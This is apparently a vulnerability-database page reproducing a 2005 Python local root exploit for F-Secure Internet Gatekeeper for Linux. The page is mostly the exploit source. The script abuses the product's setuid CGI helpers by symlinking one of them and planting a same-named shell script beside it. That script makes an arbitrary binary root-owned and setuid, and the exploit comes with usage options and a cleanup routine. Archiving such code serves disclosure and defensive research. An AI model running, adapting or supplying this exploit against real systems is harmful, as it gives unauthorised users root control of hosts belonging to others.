Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

fsigk_exp.py.txt

🗓️ 10 Nov 2005 00:00:00Reported by xavierType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

Local root exploit for F-Secure Internet Gatekeeper on Linux with usage instructions.

Code
`#!/usr/bin/env python  
################################################################  
## fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit  
## acknowledgements: everyone in pure-elite and uDc.  
##  
## coded by: [email protected] [http://xavsec.blogspot.com]  
################################################################  
  
################################################################  
## Make proper checks and import nessesary calls from modules.  
##  
  
try:   
from sys import argv  
except Exception:   
print "the 'sys' module could not be loaded"  
raise SystemExit  
  
try:   
from os import unlink, stat, error, symlink, system, chmod  
except Exception:  
print "the 'os' module could not be loaded"  
raise SystemExit  
  
try:   
import getopt  
except Exception:   
print "the 'getopt' module could not be loaded"  
raise SystemExit  
  
################################################################  
## Constants.  
##  
  
__program__ = argv[0]  
__version__ = "0.1beta"  
__author__ = "<[email protected]>"  
__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"  
__usage__ = """usage: %s [-options]  
  
options:  
--version show program's version number and exit.  
-h, --help show this help message and exit.  
  
-s, --suid file location to suid.  
-d, --dir cgi directory.  
-c, --clean cleans any left over files from the environment creation.  
-# enter numerical value of vulnerable file to exploit. [list below]  
  
1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi  
4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi  
7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi  
10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi  
13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi  
16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__)  
  
################################################################  
## Functions.  
##  
  
def _write(file, payload):  
try:   
open(file, 'w').write(payload)  
chmod(file, 0100)  
except Exception, err:   
print ("[-] %s" % (err))  
  
def _exists(path):  
try:   
stat(path)  
except error:  
return False  
return True  
  
def _handleopts():  
for opt in argv[1:]:  
if opt in ("-h", "--help"):   
print "%s" % (__usage__),  
raise SystemExit  
if opt in ("-v", "--version"):   
print "%s (%s)" % (__version__, __lastedit__),  
raise SystemExit  
  
_method_ = 'ifconfig_suid.cgi'  
_file_ = 'ifconfig.cgi'  
for opt in argv[1:]:  
if opt == "-1":   
_method_ = 'ifconfig_suid.cgi'  
elif opt == "-2":   
_method_ = 'reboot_suid.cgi'  
_file_ = 'reboot.cgi'  
elif opt == "-3":   
_method_ = 'proxy_suid.cgi'  
_file_ = 'proxy.cgi'  
elif opt == "-4":   
_method_ = 'edittmpl_suid.cgi'  
_file_ = 'edittmpl.cgi'  
elif opt == "-5":   
_method_ = 'version_suid.cgi'  
_file_ = 'version.cgi'  
elif opt == "-6":   
_method_ = 'hostname_suid.cgi'  
_file_ = 'hostname.cgi'  
elif opt == "-7":   
_method_ = 'gateway_suid.cgi'  
_file_ = 'gateway.cgi'  
elif opt == "-8":   
_method_ = 'halt_suid.cgi'  
_file_ = 'halt.cgi'  
elif opt == "-9":   
_method_ = 'edituserdb_suid.cgi'  
_file_ = 'edituserdb.cgi'  
elif opt == "-10":   
_method_ = 'htpasswd_suid.cgi'  
_file_ = 'htpasswd.cgi'  
elif opt == "-11":   
_method_ = 'pattern_up_suid.cgi'  
_file_ = 'pattern_up.cgi'  
elif opt == "-12":   
_method_ = 'license_suid.cgi'  
_file_ = 'license.cgi'  
elif opt == "-13":  
_method_ = 'iptables_suid.cgi'  
_file_ = 'iptables.cgi'  
elif opt == "-14":   
_method_ = 'dns_suid.cgi'  
_file_ = 'dns.cgi'  
elif opt == "-15":   
_method_ = 'pattern_autoup_suid.cgi'  
_file_ = 'pattern_autoup.cgi'  
elif opt == "-16":   
_method_ = 'spam_list_suid.cgi'  
_file_ = 'spam_list.cgi'  
elif opt == "-17":   
_method_ = 'diag_suid.cgi'  
_file_ = 'diag.cgi'  
else:   
pass  
  
try:  
opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \  
'suid=', \  
'dir='])[0]  
except Exception, (err):  
print "[-] %s" % (err),  
raise SystemExit  
  
_dir_ = None  
_payload_ = None  
_combine_ = None  
  
for o, a in opts:  
if o in ("-c", "--clean"):   
_clean()  
print "[*] done"  
raise SystemExit  
if o in ("-d", "--dir"):   
if _exists(a):   
_dir_ = a  
else:   
print "[-] unable to access the %s directory" % (_dir_),  
raise SystemExit  
if o in ("-s", "--suid"):   
if _exists(a):   
_payload_ = _suid(a)  
else:   
print "[-] unable to access binary."  
raise SystemExit  
  
if _dir_ == None:   
print "[-] no directory was given [try -h for help menu]"  
raise SystemExit  
if _payload_ == None:   
print "[-] enter binary to suid [try -h for help menu]"  
raise SystemExit  
_combined_ = "%s/%s" % (_dir_, _method_)  
if not _exists(_combined_):   
print "[-] method not possible, try another."  
raise SystemExit  
  
print "[*] creating environment..."  
try:  
symlink('%s/%s' % (_dir_, _method_), 'runbad')  
_write(_file_, _payload_)  
except Exception, err:  
raise SystemExit  
  
  
def _suid(file):  
_suid_ = """#!/bin/sh  
chown 0.0 %(file)s  
chmod 4755 %(file)s  
""" % (locals())  
return _suid_  
  
  
def _clean():  
try:  
files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi',   
'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi',  
'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi',  
'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi',   
'spam_list.cgi', 'diag_suid.cgi']  
  
for file in files:  
if _exists(file): unlink(file)  
  
except Exception, err:  
print "[-] %s" % (err),  
  
  
#################################################################  
## main() // main code.  
##  
  
def main():  
try:  
print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__)  
print "[*] handling options, arguments..."  
_handleopts()  
print "[*] executing exploit..."  
system('./runbad')  
print "[*] cleaning..."  
_clean()  
print "[*] done... try executing the specified binary."  
except KeyboardInterrupt:  
print "[-] caught keyboard interuption"  
raise SystemExit  
except Exception, (err):   
_clean()  
raise SystemExit  
  
if __name__ == '__main__': main()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Nov 2005 00:00Current
7.4High risk
Vulners AI Score7.4
f-secure internet gatekeeperlocal root exploitusage instructionsvulnerability list.
28